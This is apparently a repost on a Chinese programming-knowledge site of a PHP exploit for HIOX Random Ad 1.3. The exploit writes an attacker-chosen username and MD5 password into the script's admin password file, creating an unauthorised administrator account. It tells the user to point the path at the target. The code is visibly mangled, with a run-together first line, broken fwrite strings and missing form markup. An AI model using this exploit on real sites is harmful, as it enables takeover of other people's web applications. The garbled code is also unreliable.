欢迎来到福编程网,本站提供各种互联网专业知识!

HIOX Random Ad 1.3 Arbitrary Add Admin User Exploit

发布时间:1970-01-01 作者:佚名 来源:互联网
<?php@session_start();?><tablealign=centerwidth=72%height=95%><tr><td><?php/*HIOXRandomAd1.3ArbitraryAddAdminUserVulnerability[~]Discoverd&exploitedbyStack[~]GreeatzAll

@session_start();

?>

/*

HIOX Random Ad 1.3 Arbitrary Add Admin User Vulnerability

[~] Discoverd & exploited by Stack

[~]Greeatz All Freaind

[~]Special thnx to Str0ke

[~] Name Script : HIOX Random Ad 1.3

[~] Download : http://www.hscripts.com/scripts/php/downloads/HRA_1_3.zip

You need to change http://localhost/path/ with the link of script it's very importenet

*/

$creat = "true";

$iswrite = $_POST['createe'];

if($user=="" && $pass==""){

if($iswrite == "creatuser")

{

$usname = $_POST['usernam'];

$passwrd = md5($_POST['pword']);

if($usname != "" && $passwrd != ""){

$filee = "http://localhost/path/admin/passwo.php";

$file1 = file($filee);

$file = fopen($filee,'w');

fwrite($file, "

fwrite($file, "$");

fwrite($file, "user="$usname";n");

fwrite($file, "$");

fwrite($file, "pass="$passwrd";");

fwrite($file, "n?>");

fclose($file);

$creat = "false";

echo "

New User Created

Please Wait You will be Redirected to Login Page

";

}

else{

echo "

Enter correct Username or Password
";

}

}

if($creat == "true"){

?>

style="color: ffffff; font-family: arial,verdana,san-serif; font-size:13px;">

Create New User

>

User Name

Password

}

}else{

echo "

User Already Exist
";

}

?>

相关推荐